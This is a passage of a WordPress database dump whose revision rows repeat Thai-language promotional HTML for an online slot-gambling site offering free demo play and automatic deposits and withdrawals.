https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:12:09','2025-10-23 08:12:09','',16,'https://megabet333.biz/?p=104',0,'revision','',0),(105,3,'2025-10-23 08:12:09','2025-10-23 08:12:09','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:12:09','2025-10-23 08:12:09','',16,'https://megabet333.biz/?p=105',0,'revision','',0),(106,3,'2025-10-23 08:12:10','2025-10-23 08:12:10','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:12:10','2025-10-23 08:12:10','',16,'https://megabet333.biz/?p=106',0,'revision','',0),(107,3,'2025-10-23 08:15:26','2025-10-23 08:15:26','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:15:26','2025-10-23 08:15:26','',16,'https://megabet333.biz/?p=107',0,'revision','',0),(108,3,'2025-10-23 08:15:26','2025-10-23 08:15:26','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:15:26','2025-10-23 08:15:26','',16,'https://megabet333.biz/?p=108',0,'revision','',0),(109,3,'2025-10-23 08:15:27','2025-10-23 08:15:27','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:15:27','2025-10-23 08:15:27','',16,'https://megabet333.biz/?p=109',0,'revision','',0),(110,3,'2025-10-23 08:17:59','2025-10-23 08:17:59','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:17:59','2025-10-23 08:17:59','',29,'https://megabet333.biz/?p=110',0,'revision','',0),(111,3,'2025-10-23 08:17:59','2025-10-23 08:17:59','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:17:59','2025-10-23 08:17:59','',29,'https://megabet333.biz/?p=111',0,'revision','',0),(112,3,'2025-10-23 08:17:59','2025-10-23 08:17:59','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 